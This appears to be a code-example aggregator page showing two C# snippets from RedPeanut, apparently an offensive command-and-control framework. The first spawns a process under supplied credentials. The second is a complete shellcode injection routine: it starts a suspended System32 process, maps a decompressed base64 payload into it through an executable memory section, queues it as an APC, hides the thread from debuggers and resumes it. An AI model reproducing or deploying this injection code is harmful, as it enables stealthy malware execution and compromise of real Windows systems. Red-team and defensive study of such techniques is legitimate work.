예제 #1
0
파일: Spawner.cs 프로젝트: zshell/RedPeanut
        public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
        {
            Natives.STARTUPINFO startupInfo = new Natives.STARTUPINFO();
            startupInfo.cb = (uint)Marshal.SizeOf(typeof(Natives.STARTUPINFO));

            if (!Natives.CreateProcessWithLogonW(username, domain, password,
                                                 Natives.LogonFlags.NetCredentialsOnly, path + binary, path + binary + " " + arguments, cf, 0, path, ref startupInfo, out processInformation))
            {
                return(false);
            }
            Console.WriteLine("Process created");
            return(true);
        }
예제 #2
0
    static void Execute(string [] args)
    {
        var startInfo = new Natives.STARTUPINFO();

        Natives.PROCESS_INFORMATION procInfo     = new Natives.PROCESS_INFORMATION();
        Natives.LARGE_INTEGER       largeinteger = new Natives.LARGE_INTEGER();
        Natives.SYSTEM_INFO         info         = new Natives.SYSTEM_INFO();

        startInfo.cb = (uint)Marshal.SizeOf(startInfo);

        Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
        Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
        pSec.nLength = Marshal.SizeOf(pSec);
        tSec.nLength = Marshal.SizeOf(tSec);

        IntPtr section = IntPtr.Zero;
        uint   size    = 0;

        IntPtr baseAddr = IntPtr.Zero;
        IntPtr viewSize = (IntPtr)size;
        IntPtr soffset  = IntPtr.Zero;

        IntPtr baseAddrEx = IntPtr.Zero;
        IntPtr viewSizeEx = (IntPtr)size;

        IntPtr hToken = IntPtr.Zero;

        IntPtr hProcTest  = IntPtr.Zero;
        IntPtr hTokenTest = IntPtr.Zero;

        uint flags = Natives.CreateSuspended | Natives.CreateNoWindow;

        try
        {
            if (Natives.CreateProcessWithLogonW("#USERNAME#", "#DOMAIN#", "#PASSWORD#", Natives.LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\#SPAWN#", "", flags, (UInt32)0, "C:\\Windows\\System32", ref startInfo, out procInfo))
            {
                byte[] payload = DecompressDLL(Convert.FromBase64String(nutclr));

                //Round payload size to page size
                Natives.GetSystemInfo(ref info);
                size = info.dwPageSize - (uint)payload.Length % info.dwPageSize + (uint)payload.Length;
                largeinteger.LowPart = size;

                //Crteate section in current process
                var status = Natives.ZwCreateSection(ref section, Natives.GenericAll, IntPtr.Zero, ref largeinteger, Natives.PAGE_EXECUTE_READWRITE, Natives.SecCommit, IntPtr.Zero);

                //Map section to current process
                status = Natives.ZwMapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, IntPtr.Zero, IntPtr.Zero, soffset, ref viewSize, 1, 0, Natives.PAGE_EXECUTE_READWRITE);

                if (baseAddr != IntPtr.Zero)
                {
                    //Copy payload to current process section
                    Marshal.Copy(payload, 0, baseAddr, payload.Length);

                    //Map remote section
                    status = Natives.ZwMapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref viewSizeEx, 1, 0, Natives.PAGE_EXECUTE_READWRITE);

                    if (baseAddrEx != IntPtr.Zero && viewSizeEx != IntPtr.Zero)
                    {
                        //Unmap current process section
                        Natives.ZwUnmapViewOfSection(Natives.GetCurrentProcess(), baseAddr);

                        // Assign address of shellcode to the target thread apc queue
                        IntPtr th   = procInfo.hThread;
                        IntPtr ptrq = Natives.ZwQueueApcThread(th, baseAddrEx, IntPtr.Zero);
                        Natives.ZwSetInformationThread(th, 1, IntPtr.Zero, 0);

                        //Before resuming the thread we write the stager on wnf
                        //so it can be read from the spawned process from other session

                        WriteWnF(task);

                        int rest = Natives.ZwResumeThread(th, out ulong outsupn);
                    }
                    else
                    {
                        Console.WriteLine("[x] Error mapping remote section");
                        File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping remote section");
                    }
                }
                else
                {
                    Console.WriteLine("[x] Error mapping section to current process");
                    File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping section to current process");
                }

                Natives.CloseHandle(procInfo.hThread);
                Natives.CloseHandle(procInfo.hProcess);
                Natives.CloseHandle(hProcTest);
                Natives.CloseHandle(hTokenTest);
            }
            else
            {
                Console.WriteLine("[x] Error creating process");
                File.WriteAllText(@"c:\temp\log.txt", "[x] Error creating process " + Natives.GetLastError());
            }
            Natives.CloseHandle(hProcTest);
            Natives.CloseHandle(hTokenTest);
        }
        catch (Exception e)
        {
            Console.WriteLine("[x] Generic error");
            File.WriteAllText(@"c:\temp\log.txt", "[x] Generic error " + e.Message + " " + e.StackTrace);
        }
    }